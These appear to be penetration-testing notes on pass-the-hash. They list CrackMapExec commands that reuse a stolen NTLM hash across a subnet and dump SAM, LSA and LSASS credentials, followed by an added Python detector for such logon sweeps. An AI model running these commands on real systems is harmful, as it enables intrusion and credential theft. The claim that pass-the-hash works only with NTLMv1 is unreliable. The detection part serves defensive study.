If we have obtained a user's hash (LM:NT), we can use it directly in a pass-the-hash attack.

<aside> ⚠️ PASS THE HASH WORKS ONLY WITH NTLMv1!

</aside>

CrackMapExec

crackmapexec smb <subnet>/<subnet mask> -u <user> -H <LM:NT> --local-auth

<aside> ⚠️ The text Pwn3d! means that these credentials belong to a local admin account on the specified machine! In this example we are able to log in to HYDRA-DC as admin (the [+] marker), but we are NOT a local admin there.

</aside>

Dump the SAM database:

crackmapexec smb <subnet>/<subnet mask> -u <user> -H <LM:NT> --local-auth --sam

List all shares in the network:

crackmapexec smb <subnet>/<subnet mask> -u <user> -H <LM:NT> --local-auth --shares

Dump LSASS passwords:

crackmapexec smb <subnet>/<subnet mask> -u <user> -H <LM:NT> --local-auth --lsa

List all modules compatible with the SMB protocol:

crackmapexec smb -L

Lsassy

crackmapexec smb <subnet>/<subnet mask> -u <user> -H <LM:NT> --local-auth -M lsassy
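From the defender's side, the subnet sweeps above leave a recognisable trace: on every host reached, a Security event 4624 with Logon Type 3, authentication package NTLM and, because of --local-auth, an account domain equal to the host's own name, all from one source IP. The following is an added example (not part of these notes or of CrackMapExec) that applies that heuristic to constructed sample events; field values mirror the Windows Security log, and the threshold of two hosts is an assumption.

```python
from collections import namedtuple, defaultdict

Event = namedtuple("Event", "host logon_type auth_pkg logon_proc domain user src_ip")

# Constructed sample 4624 events (values mirror LogonType, AuthenticationPackageName,
# LogonProcessName, TargetDomainName, TargetUserName and IpAddress; "host" is the
# machine whose Security log recorded the event).
SAMPLE_EVENTS = [
    Event("HYDRA-DC", 3, "NTLM", "NtLmSsp", "HYDRA-DC", "admin", "10.0.0.50"),
    Event("WS01",     3, "NTLM", "NtLmSsp", "WS01",     "admin", "10.0.0.50"),
    Event("WS02",     3, "NTLM", "NtLmSsp", "WS02",     "admin", "10.0.0.50"),
    Event("WS03",     3, "NTLM", "NtLmSsp", "CORP",     "jdoe",  "10.0.0.21"),  # domain account
    Event("WS03",     3, "Kerberos", "Kerberos", "CORP", "jdoe", "10.0.0.21"), # normal domain logon
    Event("WS01",     2, "Negotiate", "User32", "WS01", "admin", "-"),          # console logon
]

def is_local_ntlm_network_logon(ev):
    """Network logon (type 3) authenticated by NTLM against a *local* account:
    the account domain is the host's own name rather than the AD domain.
    This is the shape a --local-auth pass-the-hash logon produces; on its own
    it is a weak signal, since legitimate admin tooling can look the same."""
    return bool(ev.logon_type == 3
                and ev.auth_pkg.upper() == "NTLM"
                and ev.logon_proc.lower() == "ntlmssp"
                and ev.domain.upper() == ev.host.upper()
                and ev.user.upper() != "ANONYMOUS LOGON")

def find_local_hash_sweeps(events, min_hosts=2):
    """Group local NTLM network logons by (source IP, user) and report pairs that
    reached at least min_hosts distinct machines: one source reusing one local
    account across a subnet is the sweep pattern of the commands above."""
    hosts = defaultdict(set)
    for ev in events:
        if is_local_ntlm_network_logon(ev):
            hosts[(ev.src_ip, ev.user)].add(ev.host)
    return {key: sorted(h) for key, h in hosts.items() if len(h) >= min_hosts}

if __name__ == "__main__":
    for (src, user), reached in find_local_hash_sweeps(SAMPLE_EVENTS).items():
        print(f"possible pass-the-hash sweep: {src} as local '{user}' -> {reached}")
```

Feed it real 4624 records (e.g. exported as JSON from a SIEM) and tune min_hosts to the environment; a single local NTLM logon is normal, the same hash fanning out across many hosts is not.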